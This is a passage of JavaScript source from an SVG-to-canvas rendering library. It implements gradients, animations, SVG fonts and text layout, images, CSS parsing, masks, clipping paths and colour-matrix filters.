				var stopsContainer = this;
				if (this.getHrefAttribute().hasValue()) {
					stopsContainer = this.getHrefAttribute().getDefinition();
					this.inheritStopContainer(stopsContainer);
				}

				var addParentOpacity = function (color) {
					if (parentOpacityProp.hasValue()) {
						var p = new svg.Property('color', color);
						return p.addOpacity(parentOpacityProp).value;
					}
					return color;
				};

				var g = this.getGradient(ctx, element);
				if (g == null) return addParentOpacity(stopsContainer.stops[stopsContainer.stops.length - 1].color);
				for (var i=0; i<stopsContainer.stops.length; i++) {
					g.addColorStop(stopsContainer.stops[i].offset, addParentOpacity(stopsContainer.stops[i].color));
				}

				if (this.attribute('gradientTransform').hasValue()) {
					// render as transformed pattern on temporary canvas
					var rootView = svg.ViewPort.viewPorts[0];

					var rect = new svg.Element.rect();
					rect.attributes['x'] = new svg.Property('x', -svg.MAX_VIRTUAL_PIXELS/3.0);
					rect.attributes['y'] = new svg.Property('y', -svg.MAX_VIRTUAL_PIXELS/3.0);
					rect.attributes['width'] = new svg.Property('width', svg.MAX_VIRTUAL_PIXELS);
					rect.attributes['height'] = new svg.Property('height', svg.MAX_VIRTUAL_PIXELS);

					var group = new svg.Element.g();
					group.attributes['transform'] = new svg.Property('transform', this.attribute('gradientTransform').value);
					group.children = [ rect ];

					var tempSvg = new svg.Element.svg();
					tempSvg.attributes['x'] = new svg.Property('x', 0);
					tempSvg.attributes['y'] = new svg.Property('y', 0);
					tempSvg.attributes['width'] = new svg.Property('width', rootView.width);
					tempSvg.attributes['height'] = new svg.Property('height', rootView.height);
					tempSvg.children = [ group ];

					var c = document.createElement('canvas');
					c.width = rootView.width;
					c.height = rootView.height;
					var tempCtx = c.getContext('2d');
					tempCtx.fillStyle = g;
					tempSvg.render(tempCtx);
					return tempCtx.createPattern(c, 'no-repeat');
				}

				return g;
			}
		}
		svg.Element.GradientBase.prototype = new svg.Element.ElementBase;

		// linear gradient element
		svg.Element.linearGradient = function(node) {
			this.base = svg.Element.GradientBase;
			this.base(node);
			
			this.attributesToInherit.push('x1');
			this.attributesToInherit.push('y1');
			this.attributesToInherit.push('x2');
			this.attributesToInherit.push('y2');

			this.getGradient = function(ctx, element) {
				var bb = this.gradientUnits() == 'objectBoundingBox' ? element.getBoundingBox() : null;

				if (!this.attribute('x1').hasValue()
				 && !this.attribute('y1').hasValue()
				 && !this.attribute('x2').hasValue()
				 && !this.attribute('y2').hasValue()) {
					this.attribute('x1', true).value = 0;
					this.attribute('y1', true).value = 0;
					this.attribute('x2', true).value = 1;
					this.attribute('y2', true).value = 0;
				 }

				var x1 = (this.gradientUnits() == 'objectBoundingBox'
					? bb.x() + bb.width() * this.attribute('x1').numValue()
					: this.attribute('x1').toPixels('x'));
				var y1 = (this.gradientUnits() == 'objectBoundingBox'
					? bb.y() + bb.height() * this.attribute('y1').numValue()
					: this.attribute('y1').toPixels('y'));
				var x2 = (this.gradientUnits() == 'objectBoundingBox'
					? bb.x() + bb.width() * this.attribute('x2').numValue()
					: this.attribute('x2').toPixels('x'));
				var y2 = (this.gradientUnits() == 'objectBoundingBox'
					? bb.y() + bb.height() * this.attribute('y2').numValue()
					: this.attribute('y2').toPixels('y'));

				if (x1 == x2 && y1 == y2) return null;
				return ctx.createLinearGradient(x1, y1, x2, y2);
			}
		}
		svg.Element.linearGradient.prototype = new svg.Element.GradientBase;

		// radial gradient element
		svg.Element.radialGradient = function(node) {
			this.base = svg.Element.GradientBase;
			this.base(node);
			
			this.attributesToInherit.push('cx');
			this.attributesToInherit.push('cy');
			this.attributesToInherit.push('r');
			this.attributesToInherit.push('fx');
			this.attributesToInherit.push('fy');

			this.getGradient = function(ctx, element) {
				var bb = element.getBoundingBox();

				if (!this.attribute('cx').hasValue()) this.attribute('cx', true).value = '50%';
				if (!this.attribute('cy').hasValue()) this.attribute('cy', true).value = '50%';
				if (!this.attribute('r').hasValue()) this.attribute('r', true).value = '50%';

				var cx = (this.gradientUnits() == 'objectBoundingBox'
					? bb.x() + bb.width() * this.attribute('cx').numValue()
					: this.attribute('cx').toPixels('x'));
				var cy = (this.gradientUnits() == 'objectBoundingBox'
					? bb.y() + bb.height() * this.attribute('cy').numValue()
					: this.attribute('cy').toPixels('y'));

				var fx = cx;
				var fy = cy;
				if (this.attribute('fx').hasValue()) {
					fx = (this.gradientUnits() == 'objectBoundingBox'
					? bb.x() + bb.width() * this.attribute('fx').numValue()
					: this.attribute('fx').toPixels('x'));
				}
				if (this.attribute('fy').hasValue()) {
					fy = (this.gradientUnits() == 'objectBoundingBox'
					? bb.y() + bb.height() * this.attribute('fy').numValue()
					: this.attribute('fy').toPixels('y'));
				}

				var r = (this.gradientUnits() == 'objectBoundingBox'
					? (bb.width() + bb.height()) / 2.0 * this.attribute('r').numValue()
					: this.attribute('r').toPixels());

				return ctx.createRadialGradient(fx, fy, 0, cx, cy, r);
			}
		}
		svg.Element.radialGradient.prototype = new svg.Element.GradientBase;

		// gradient stop element
		svg.Element.stop = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.offset = this.attribute('offset').numValue();
			if (this.offset < 0) this.offset = 0;
			if (this.offset > 1) this.offset = 1;

			var stopColor = this.style('stop-color', true);
			if (stopColor.value === '') stopColor.value = '#000';
			if (this.style('stop-opacity').hasValue()) stopColor = stopColor.addOpacity(this.style('stop-opacity'));
			this.color = stopColor.value;
		}
		svg.Element.stop.prototype = new svg.Element.ElementBase;

		// animation base element
		svg.Element.AnimateBase = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			svg.Animations.push(this);

			this.duration = 0.0;
			this.begin = this.attribute('begin').toMilliseconds();
			this.maxDuration = this.begin + this.attribute('dur').toMilliseconds();

			this.getProperty = function() {
				var attributeType = this.attribute('attributeType').value;
				var attributeName = this.attribute('attributeName').value;

				if (attributeType == 'CSS') {
					return this.parent.style(attributeName, true);
				}
				return this.parent.attribute(attributeName, true);
			};

			this.initialValue = null;
			this.initialUnits = '';
			this.removed = false;

			this.calcValue = function() {
				// OVERRIDE ME!
				return '';
			}

			this.update = function(delta) {
				// set initial value
				if (this.initialValue == null) {
					this.initialValue = this.getProperty().value;
					this.initialUnits = this.getProperty().getUnits();
				}

				// if we're past the end time
				if (this.duration > this.maxDuration) {
					// loop for indefinitely repeating animations
					if (this.attribute('repeatCount').value == 'indefinite'
					 || this.attribute('repeatDur').value == 'indefinite') {
						this.duration = 0.0
					}
					else if (this.attribute('fill').valueOrDefault('remove') == 'freeze' && !this.frozen) {
						this.frozen = true;
						this.parent.animationFrozen = true;
						this.parent.animationFrozenValue = this.getProperty().value;
					}
					else if (this.attribute('fill').valueOrDefault('remove') == 'remove' && !this.removed) {
						this.removed = true;
						this.getProperty().value = this.parent.animationFrozen ? this.parent.animationFrozenValue : this.initialValue;
						return true;
					}
					return false;
				}
				this.duration = this.duration + delta;

				// if we're past the begin time
				var updated = false;
				if (this.begin < this.duration) {
					var newValue = this.calcValue(); // tween

					if (this.attribute('type').hasValue()) {
						// for transform, etc.
						var type = this.attribute('type').value;
						newValue = type + '(' + newValue + ')';
					}

					this.getProperty().value = newValue;
					updated = true;
				}

				return updated;
			}

			this.from = this.attribute('from');
			this.to = this.attribute('to');
			this.values = this.attribute('values');
			if (this.values.hasValue()) this.values.value = this.values.value.split(';');

			// fraction of duration we've covered
			this.progress = function() {
				var ret = { progress: (this.duration - this.begin) / (this.maxDuration - this.begin) };
				if (this.values.hasValue()) {
					var p = ret.progress * (this.values.value.length - 1);
					var lb = Math.floor(p), ub = Math.ceil(p);
					ret.from = new svg.Property('from', parseFloat(this.values.value[lb]));
					ret.to = new svg.Property('to', parseFloat(this.values.value[ub]));
					ret.progress = (p - lb) / (ub - lb);
				}
				else {
					ret.from = this.from;
					ret.to = this.to;
				}
				return ret;
			}
		}
		svg.Element.AnimateBase.prototype = new svg.Element.ElementBase;

		// animate element
		svg.Element.animate = function(node) {
			this.base = svg.Element.AnimateBase;
			this.base(node);

			this.calcValue = function() {
				var p = this.progress();

				// tween value linearly
				var newValue = p.from.numValue() + (p.to.numValue() - p.from.numValue()) * p.progress;
				return newValue + this.initialUnits;
			};
		}
		svg.Element.animate.prototype = new svg.Element.AnimateBase;

		// animate color element
		svg.Element.animateColor = function(node) {
			this.base = svg.Element.AnimateBase;
			this.base(node);

			this.calcValue = function() {
				var p = this.progress();
				var from = new RGBColor(p.from.value);
				var to = new RGBColor(p.to.value);

				if (from.ok && to.ok) {
					// tween color linearly
					var r = from.r + (to.r - from.r) * p.progress;
					var g = from.g + (to.g - from.g) * p.progress;
					var b = from.b + (to.b - from.b) * p.progress;
					return 'rgb('+parseInt(r,10)+','+parseInt(g,10)+','+parseInt(b,10)+')';
				}
				return this.attribute('from').value;
			};
		}
		svg.Element.animateColor.prototype = new svg.Element.AnimateBase;

		// animate transform element
		svg.Element.animateTransform = function(node) {
			this.base = svg.Element.AnimateBase;
			this.base(node);

			this.calcValue = function() {
				var p = this.progress();

				// tween value linearly
				var from = svg.ToNumberArray(p.from.value);
				var to = svg.ToNumberArray(p.to.value);
				var newValue = '';
				for (var i=0; i<from.length; i++) {
					newValue += from[i] + (to[i] - from[i]) * p.progress + ' ';
				}
				return newValue;
			};
		}
		svg.Element.animateTransform.prototype = new svg.Element.animate;

		// font element
		svg.Element.font = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.horizAdvX = this.attribute('horiz-adv-x').numValue();

			this.isRTL = false;
			this.isArabic = false;
			this.fontFace = null;
			this.missingGlyph = null;
			this.glyphs = [];
			for (var i=0; i<this.children.length; i++) {
				var child = this.children[i];
				if (child.type == 'font-face') {
					this.fontFace = child;
					if (child.style('font-family').hasValue()) {
						svg.Definitions[child.style('font-family').value] = this;
					}
				}
				else if (child.type == 'missing-glyph') this.missingGlyph = child;
				else if (child.type == 'glyph') {
					if (child.arabicForm != '') {
						this.isRTL = true;
						this.isArabic = true;
						if (typeof(this.glyphs[child.unicode]) == 'undefined') this.glyphs[child.unicode] = [];
						this.glyphs[child.unicode][child.arabicForm] = child;
					}
					else {
						this.glyphs[child.unicode] = child;
					}
				}
			}
		}
		svg.Element.font.prototype = new svg.Element.ElementBase;

		// font-face element
		svg.Element.fontface = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.ascent = this.attribute('ascent').value;
			this.descent = this.attribute('descent').value;
			this.unitsPerEm = this.attribute('units-per-em').numValue();
		}
		svg.Element.fontface.prototype = new svg.Element.ElementBase;

		// missing-glyph element
		svg.Element.missingglyph = function(node) {
			this.base = svg.Element.path;
			this.base(node);

			this.horizAdvX = 0;
		}
		svg.Element.missingglyph.prototype = new svg.Element.path;

		// glyph element
		svg.Element.glyph = function(node) {
			this.base = svg.Element.path;
			this.base(node);

			this.horizAdvX = this.attribute('horiz-adv-x').numValue();
			this.unicode = this.attribute('unicode').value;
			this.arabicForm = this.attribute('arabic-form').value;
		}
		svg.Element.glyph.prototype = new svg.Element.path;

		// text element
		svg.Element.text = function(node) {
			this.captureTextNodes = true;
			this.base = svg.Element.RenderedElementBase;
			this.base(node);

			this.baseSetContext = this.setContext;
			this.setContext = function(ctx) {
				this.baseSetContext(ctx);

				var textBaseline = this.style('dominant-baseline').toTextBaseline();
				if (textBaseline == null) textBaseline = this.style('alignment-baseline').toTextBaseline();
				if (textBaseline != null) ctx.textBaseline = textBaseline;
			}

			this.getBoundingBox = function () {
				var x = this.attribute('x').toPixels('x');
				var y = this.attribute('y').toPixels('y');
				var fontSize = this.parent.style('font-size').numValueOrDefault(svg.Font.Parse(svg.ctx.font).fontSize);
				return new svg.BoundingBox(x, y - fontSize, x + Math.floor(fontSize * 2.0 / 3.0) * this.children[0].getText().length, y);
			}

			this.renderChildren = function(ctx) {
				this.x = this.attribute('x').toPixels('x');
				this.y = this.attribute('y').toPixels('y');
				if (this.attribute('dx').hasValue()) this.x += this.attribute('dx').toPixels('x');
				if (this.attribute('dy').hasValue()) this.y += this.attribute('dy').toPixels('y');
				this.x += this.getAnchorDelta(ctx, this, 0);
				for (var i=0; i<this.children.length; i++) {
					this.renderChild(ctx, this, i);
				}
			}

			this.getAnchorDelta = function (ctx, parent, startI) {
				var textAnchor = this.style('text-anchor').valueOrDefault('start');
				if (textAnchor != 'start') {
					var width = 0;
					for (var i=startI; i<parent.children.length; i++) {
						var child = parent.children[i];
						if (i > startI && child.attribute('x').hasValue()) break; // new group
						width += child.measureTextRecursive(ctx);
					}
					return -1 * (textAnchor == 'end' ? width : width / 2.0);
				}
				return 0;
			}

			this.renderChild = function(ctx, parent, i) {
				var child = parent.children[i];
				if (child.attribute('x').hasValue()) {
					child.x = child.attribute('x').toPixels('x') + parent.getAnchorDelta(ctx, parent, i);
					if (child.attribute('dx').hasValue()) child.x += child.attribute('dx').toPixels('x');
				}
				else {
					if (child.attribute('dx').hasValue()) parent.x += child.attribute('dx').toPixels('x');
					child.x = parent.x;
				}
				parent.x = child.x + child.measureText(ctx);

				if (child.attribute('y').hasValue()) {
					child.y = child.attribute('y').toPixels('y');
					if (child.attribute('dy').hasValue()) child.y += child.attribute('dy').toPixels('y');
				}
				else {
					if (child.attribute('dy').hasValue()) parent.y += child.attribute('dy').toPixels('y');
					child.y = parent.y;
				}
				parent.y = child.y;

				child.render(ctx);

				for (var i=0; i<child.children.length; i++) {
					parent.renderChild(ctx, child, i);
				}
			}
		}
		svg.Element.text.prototype = new svg.Element.RenderedElementBase;

		// text base
		svg.Element.TextElementBase = function(node) {
			this.base = svg.Element.RenderedElementBase;
			this.base(node);

			this.getGlyph = function(font, text, i) {
				var c = text[i];
				var glyph = null;
				if (font.isArabic) {
					var arabicForm = 'isolated';
					if ((i==0 || text[i-1]==' ') && i<text.length-2 && text[i+1]!=' ') arabicForm = 'terminal';
					if (i>0 && text[i-1]!=' ' && i<text.length-2 && text[i+1]!=' ') arabicForm = 'medial';
					if (i>0 && text[i-1]!=' ' && (i == text.length-1 || text[i+1]==' ')) arabicForm = 'initial';
					if (typeof(font.glyphs[c]) != 'undefined') {
						glyph = font.glyphs[c][arabicForm];
						if (glyph == null && font.glyphs[c].type == 'glyph') glyph = font.glyphs[c];
					}
				}
				else {
					glyph = font.glyphs[c];
				}
				if (glyph == null) glyph = font.missingGlyph;
				return glyph;
			}

			this.renderChildren = function(ctx) {
				var customFont = this.parent.style('font-family').getDefinition();
				if (customFont != null) {
					var fontSize = this.parent.style('font-size').numValueOrDefault(svg.Font.Parse(svg.ctx.font).fontSize);
					var fontStyle = this.parent.style('font-style').valueOrDefault(svg.Font.Parse(svg.ctx.font).fontStyle);
					var text = this.getText();
					if (customFont.isRTL) text = text.split("").reverse().join("");

					var dx = svg.ToNumberArray(this.parent.attribute('dx').value);
					for (var i=0; i<text.length; i++) {
						var glyph = this.getGlyph(customFont, text, i);
						var scale = fontSize / customFont.fontFace.unitsPerEm;
						ctx.translate(this.x, this.y);
						ctx.scale(scale, -scale);
						var lw = ctx.lineWidth;
						ctx.lineWidth = ctx.lineWidth * customFont.fontFace.unitsPerEm / fontSize;
						if (fontStyle == 'italic') ctx.transform(1, 0, .4, 1, 0, 0);
						glyph.render(ctx);
						if (fontStyle == 'italic') ctx.transform(1, 0, -.4, 1, 0, 0);
						ctx.lineWidth = lw;
						ctx.scale(1/scale, -1/scale);
						ctx.translate(-this.x, -this.y);

						this.x += fontSize * (glyph.horizAdvX || customFont.horizAdvX) / customFont.fontFace.unitsPerEm;
						if (typeof(dx[i]) != 'undefined' && !isNaN(dx[i])) {
							this.x += dx[i];
						}
					}
					return;
				}

				if (ctx.fillStyle != '') ctx.fillText(svg.compressSpaces(this.getText()), this.x, this.y);
				if (ctx.strokeStyle != '') ctx.strokeText(svg.compressSpaces(this.getText()), this.x, this.y);
			}

			this.getText = function() {
				// OVERRIDE ME
			}

			this.measureTextRecursive = function(ctx) {
				var width = this.measureText(ctx);
				for (var i=0; i<this.children.length; i++) {
					width += this.children[i].measureTextRecursive(ctx);
				}
				return width;
			}

			this.measureText = function(ctx) {
				var customFont = this.parent.style('font-family').getDefinition();
				if (customFont != null) {
					var fontSize = this.parent.style('font-size').numValueOrDefault(svg.Font.Parse(svg.ctx.font).fontSize);
					var measure = 0;
					var text = this.getText();
					if (customFont.isRTL) text = text.split("").reverse().join("");
					var dx = svg.ToNumberArray(this.parent.attribute('dx').value);
					for (var i=0; i<text.length; i++) {
						var glyph = this.getGlyph(customFont, text, i);
						measure += (glyph.horizAdvX || customFont.horizAdvX) * fontSize / customFont.fontFace.unitsPerEm;
						if (typeof(dx[i]) != 'undefined' && !isNaN(dx[i])) {
							measure += dx[i];
						}
					}
					return measure;
				}

				var textToMeasure = svg.compressSpaces(this.getText());
				if (!ctx.measureText) return textToMeasure.length * 10;

				ctx.save();
				this.setContext(ctx);
				var width = ctx.measureText(textToMeasure).width;
				ctx.restore();
				return width;
			}
		}
		svg.Element.TextElementBase.prototype = new svg.Element.RenderedElementBase;

		// tspan
		svg.Element.tspan = function(node) {
			this.captureTextNodes = true;
			this.base = svg.Element.TextElementBase;
			this.base(node);

			this.text = svg.compressSpaces(node.value || node.text || node.textContent || '');
			this.getText = function() {
				// if this node has children, then they own the text
				if (this.children.length > 0) { return ''; }
				return this.text;
			}
		}
		svg.Element.tspan.prototype = new svg.Element.TextElementBase;

		// tref
		svg.Element.tref = function(node) {
			this.base = svg.Element.TextElementBase;
			this.base(node);

			this.getText = function() {
				var element = this.getHrefAttribute().getDefinition();
				if (element != null) return element.children[0].getText();
			}
		}
		svg.Element.tref.prototype = new svg.Element.TextElementBase;

		// a element
		svg.Element.a = function(node) {
			this.base = svg.Element.TextElementBase;
			this.base(node);

			this.hasText = node.childNodes.length > 0;
			for (var i=0; i<node.childNodes.length; i++) {
				if (node.childNodes[i].nodeType != 3) this.hasText = false;
			}

			// this might contain text
			this.text = this.hasText ? node.childNodes[0].value : '';
			this.getText = function() {
				return this.text;
			}

			this.baseRenderChildren = this.renderChildren;
			this.renderChildren = function(ctx) {
				if (this.hasText) {
					// render as text element
					this.baseRenderChildren(ctx);
					var fontSize = new svg.Property('fontSize', svg.Font.Parse(svg.ctx.font).fontSize);
					svg.Mouse.checkBoundingBox(this, new svg.BoundingBox(this.x, this.y - fontSize.toPixels('y'), this.x + this.measureText(ctx), this.y));
				}
				else if (this.children.length > 0) {
					// render as temporary group
					var g = new svg.Element.g();
					g.children = this.children;
					g.parent = this;
					g.render(ctx);
				}
			}

			this.onclick = function() {
				window.open(this.getHrefAttribute().value);
			}

			this.onmousemove = function() {
				svg.ctx.canvas.style.cursor = 'pointer';
			}
		}
		svg.Element.a.prototype = new svg.Element.TextElementBase;

		// image element
		svg.Element.image = function(node) {
			this.base = svg.Element.RenderedElementBase;
			this.base(node);

			var href = this.getHrefAttribute().value;
			if (href == '') { return; }
			var isSvg = href.match(/\.svg$/)

			svg.Images.push(this);
			this.loaded = false;
			if (!isSvg) {
				this.img = document.createElement('img');
				if (svg.opts['useCORS'] == true) { this.img.crossOrigin = 'Anonymous'; }
				var self = this;
				this.img.onload = function() { self.loaded = true; }
				this.img.onerror = function() { svg.log('ERROR: image "' + href + '" not found'); self.loaded = true; }
				this.img.src = href;
			}
			else {
				this.img = svg.ajax(href);
				this.loaded = true;
			}

			this.renderChildren = function(ctx) {
				var x = this.attribute('x').toPixels('x');
				var y = this.attribute('y').toPixels('y');

				var width = this.attribute('width').toPixels('x');
				var height = this.attribute('height').toPixels('y');
				if (width == 0 || height == 0) return;

				ctx.save();
				if (isSvg) {
					ctx.drawSvg(this.img, x, y, width, height);
				}
				else {
					ctx.translate(x, y);
					svg.AspectRatio(ctx,
									this.attribute('preserveAspectRatio').value,
									width,
									this.img.width,
									height,
									this.img.height,
									0,
									0);
					ctx.drawImage(this.img, 0, 0);
				}
				ctx.restore();
			}

			this.getBoundingBox = function() {
				var x = this.attribute('x').toPixels('x');
				var y = this.attribute('y').toPixels('y');
				var width = this.attribute('width').toPixels('x');
				var height = this.attribute('height').toPixels('y');
				return new svg.BoundingBox(x, y, x + width, y + height);
			}
		}
		svg.Element.image.prototype = new svg.Element.RenderedElementBase;

		// group element
		svg.Element.g = function(node) {
			this.base = svg.Element.RenderedElementBase;
			this.base(node);

			this.getBoundingBox = function() {
				var bb = new svg.BoundingBox();
				for (var i=0; i<this.children.length; i++) {
					bb.addBoundingBox(this.children[i].getBoundingBox());
				}
				return bb;
			};
		}
		svg.Element.g.prototype = new svg.Element.RenderedElementBase;

		// symbol element
		svg.Element.symbol = function(node) {
			this.base = svg.Element.RenderedElementBase;
			this.base(node);

			this.render = function(ctx) {
				// NO RENDER
			};
		}
		svg.Element.symbol.prototype = new svg.Element.RenderedElementBase;

		// style element
		svg.Element.style = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			// text, or spaces then CDATA
			var css = ''
			for (var i=0; i<node.childNodes.length; i++) {
			  css += node.childNodes[i].data;
			}
			css = css.replace(/(\/\*([^*]|[\r\n]|(\*+([^*\/]|[\r\n])))*\*+\/)|(^[\s]*\/\/.*)/gm, ''); // remove comments
			css = svg.compressSpaces(css); // replace whitespace
			var cssDefs = css.split('}');
			for (var i=0; i<cssDefs.length; i++) {
				if (svg.trim(cssDefs[i]) != '') {
					var cssDef = cssDefs[i].split('{');
					var cssClasses = cssDef[0].split(',');
					var cssProps = cssDef[1].split(';');
					for (var j=0; j<cssClasses.length; j++) {
						var cssClass = svg.trim(cssClasses[j]);
						if (cssClass != '') {
							var props = svg.Styles[cssClass] || {};
							for (var k=0; k<cssProps.length; k++) {
								var prop = cssProps[k].indexOf(':');
								var name = cssProps[k].substr(0, prop);
								var value = cssProps[k].substr(prop + 1, cssProps[k].length - prop);
								if (name != null && value != null) {
									props[svg.trim(name)] = new svg.Property(svg.trim(name), svg.trim(value));
								}
							}
							svg.Styles[cssClass] = props;
							svg.StylesSpecificity[cssClass] = getSelectorSpecificity(cssClass);
							if (cssClass == '@font-face') {
								var fontFamily = props['font-family'].value.replace(/"/g,'');
								var srcs = props['src'].value.split(',');
								for (var s=0; s<srcs.length; s++) {
									if (srcs[s].indexOf('format("svg")') > 0) {
										var urlStart = srcs[s].indexOf('url');
										var urlEnd = srcs[s].indexOf(')', urlStart);
										var url = srcs[s].substr(urlStart + 5, urlEnd - urlStart - 6);
										var doc = svg.parseXml(svg.ajax(url));
										var fonts = doc.getElementsByTagName('font');
										for (var f=0; f<fonts.length; f++) {
											var font = svg.CreateElement(fonts[f]);
											svg.Definitions[fontFamily] = font;
										}
									}
								}
							}
						}
					}
				}
			}
		}
		svg.Element.style.prototype = new svg.Element.ElementBase;

		// use element
		svg.Element.use = function(node) {
			this.base = svg.Element.RenderedElementBase;
			this.base(node);

			this.baseSetContext = this.setContext;
			this.setContext = function(ctx) {
				this.baseSetContext(ctx);
				if (this.attribute('x').hasValue()) ctx.translate(this.attribute('x').toPixels('x'), 0);
				if (this.attribute('y').hasValue()) ctx.translate(0, this.attribute('y').toPixels('y'));
			}

			var element = this.getHrefAttribute().getDefinition();

			this.path = function(ctx) {
				if (element != null) element.path(ctx);
			}

			this.getBoundingBox = function() {
				if (element != null) return element.getBoundingBox();
			}

			this.renderChildren = function(ctx) {
				if (element != null) {
					var tempSvg = element;
					if (element.type == 'symbol') {
						// render me using a temporary svg element in symbol cases (http://www.w3.org/TR/SVG/struct.html#UseElement)
						tempSvg = new svg.Element.svg();
						tempSvg.type = 'svg';
						tempSvg.attributes['viewBox'] = new svg.Property('viewBox', element.attribute('viewBox').value);
						tempSvg.attributes['preserveAspectRatio'] = new svg.Property('preserveAspectRatio', element.attribute('preserveAspectRatio').value);
						tempSvg.attributes['overflow'] = new svg.Property('overflow', element.attribute('overflow').value);
						tempSvg.children = element.children;
					}
					if (tempSvg.type == 'svg') {
						// if symbol or svg, inherit width/height from me
						if (this.attribute('width').hasValue()) tempSvg.attributes['width'] = new svg.Property('width', this.attribute('width').value);
						if (this.attribute('height').hasValue()) tempSvg.attributes['height'] = new svg.Property('height', this.attribute('height').value);
					}
					var oldParent = tempSvg.parent;
					tempSvg.parent = null;
					tempSvg.render(ctx);
					tempSvg.parent = oldParent;
				}
			}
		}
		svg.Element.use.prototype = new svg.Element.RenderedElementBase;

		// mask element
		svg.Element.mask = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.apply = function(ctx, element) {
				// render as temp svg
				var x = this.attribute('x').toPixels('x');
				var y = this.attribute('y').toPixels('y');
				var width = this.attribute('width').toPixels('x');
				var height = this.attribute('height').toPixels('y');

				if (width == 0 && height == 0) {
					var bb = new svg.BoundingBox();
					for (var i=0; i<this.children.length; i++) {
						bb.addBoundingBox(this.children[i].getBoundingBox());
					}
					var x = Math.floor(bb.x1);
					var y = Math.floor(bb.y1);
					var width = Math.floor(bb.width());
					var	height = Math.floor(bb.height());
				}

				// temporarily remove mask to avoid recursion
				var mask = element.attribute('mask').value;
				element.attribute('mask').value = '';

					var cMask = document.createElement('canvas');
					cMask.width = x + width;
					cMask.height = y + height;
					var maskCtx = cMask.getContext('2d');
					this.renderChildren(maskCtx);

					var c = document.createElement('canvas');
					c.width = x + width;
					c.height = y + height;
					var tempCtx = c.getContext('2d');
					element.render(tempCtx);
					tempCtx.globalCompositeOperation = 'destination-in';
					tempCtx.fillStyle = maskCtx.createPattern(cMask, 'no-repeat');
					tempCtx.fillRect(0, 0, x + width, y + height);

					ctx.fillStyle = tempCtx.createPattern(c, 'no-repeat');
					ctx.fillRect(0, 0, x + width, y + height);

				// reassign mask
				element.attribute('mask').value = mask;
			}

			this.render = function(ctx) {
				// NO RENDER
			}
		}
		svg.Element.mask.prototype = new svg.Element.ElementBase;

		// clip element
		svg.Element.clipPath = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.apply = function(ctx) {
				var oldBeginPath = CanvasRenderingContext2D.prototype.beginPath;
				CanvasRenderingContext2D.prototype.beginPath = function () { };

				var oldClosePath = CanvasRenderingContext2D.prototype.closePath;
				CanvasRenderingContext2D.prototype.closePath = function () { };

				oldBeginPath.call(ctx);
				for (var i=0; i<this.children.length; i++) {
					var child = this.children[i];
					if (typeof(child.path) != 'undefined') {
						var transform = null;
						if (child.style('transform', false, true).hasValue()) {
							transform = new svg.Transform(child.style('transform', false, true).value);
							transform.apply(ctx);
						}
						child.path(ctx);
						CanvasRenderingContext2D.prototype.closePath = oldClosePath;
						if (transform) { transform.unapply(ctx); }
					}
				}
				oldClosePath.call(ctx);
				ctx.clip();

				CanvasRenderingContext2D.prototype.beginPath = oldBeginPath;
				CanvasRenderingContext2D.prototype.closePath = oldClosePath;
			}

			this.render = function(ctx) {
				// NO RENDER
			}
		}
		svg.Element.clipPath.prototype = new svg.Element.ElementBase;

		// filters
		svg.Element.filter = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.apply = function(ctx, element) {
				// render as temp svg
				var bb = element.getBoundingBox();
				var x = Math.floor(bb.x1);
				var y = Math.floor(bb.y1);
				var width = Math.floor(bb.width());
				var	height = Math.floor(bb.height());

				// temporarily remove filter to avoid recursion
				var filter = element.style('filter').value;
				element.style('filter').value = '';

				var px = 0, py = 0;
				for (var i=0; i<this.children.length; i++) {
					var efd = this.children[i].extraFilterDistance || 0;
					px = Math.max(px, efd);
					py = Math.max(py, efd);
				}

				var c = document.createElement('canvas');
				c.width = width + 2*px;
				c.height = height + 2*py;
				var tempCtx = c.getContext('2d');
				tempCtx.translate(-x + px, -y + py);
				element.render(tempCtx);

				// apply filters
				for (var i=0; i<this.children.length; i++) {
					if (typeof(this.children[i].apply) === 'function') {
						this.children[i].apply(tempCtx, 0, 0, width + 2*px, height + 2*py);
					}
				}

				// render on me
				ctx.drawImage(c, 0, 0, width + 2*px, height + 2*py, x - px, y - py, width + 2*px, height + 2*py);

				// reassign filter
				element.style('filter', true).value = filter;
			}

			this.render = function(ctx) {
				// NO RENDER
			}
		}
		svg.Element.filter.prototype = new svg.Element.ElementBase;

		svg.Element.feMorphology = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.apply = function(ctx, x, y, width, height) {
				// TODO: implement
			}
		}
		svg.Element.feMorphology.prototype = new svg.Element.ElementBase;

		svg.Element.feComposite = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.apply = function(ctx, x, y, width, height) {
				// TODO: implement
			}
		}
		svg.Element.feComposite.prototype = new svg.Element.ElementBase;

		svg.Element.feColorMatrix = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			var matrix = svg.ToNumberArray(this.attribute('values').value);
			switch (this.attribute('type').valueOrDefault('matrix')) { // http://www.w3.org/TR/SVG/filters.html#feColorMatrixElement
				case 'saturate':
					var s = matrix[0];
					matrix = [0.213+0.787*s,0.715-0.715*s,0.072-0.072*s,0,0,
							  0.213-0.213*s,0.715+0.285*s,0.072-0.072*s,0,0,
							  0.213-0.213*s,0.715-0.715*s,0.072+0.928*s,0,0,
							  0,0,0,1,0,
							  0,0,0,0,1];
					break;
				case 'hueRotate':
					var a = matrix[0] * Math.PI / 180.0;
					var c = function (m1,m2,m3) { return m1 + Math.cos(a)*m2 + Math.sin(a)*m3; };
					matrix = [c(0.213,0.787,-0.213),c(0.715,-0.715,-0.715),c(0.072,-0.072,0.928),0,0,
							  c(0.213,-0.213,0.143),c(0.715,0.285,0.140),c(0.072,-0.072,-0.283),0,0,
							  c(0.213,-0.213,-0.787),c(0.715,-0.715,0.715),c(0.072,0.928,0.072),0,0,
							  0,0,0,1,0,
							  0,0,0,0,1];
					break;
				case 'luminanceToAlpha':
					matrix = [0,0,0,0,0,
							  0,0,0,0,0,
							  0,0,0,0,0,
							  0.2125,0.7154,0.0721,0,0,
							  0,0,0,0,1];
					break;
			}

			function imGet(img, x, y, width, height, rgba) {
				return img[y*width*4 + x*4 + rgba];
			}

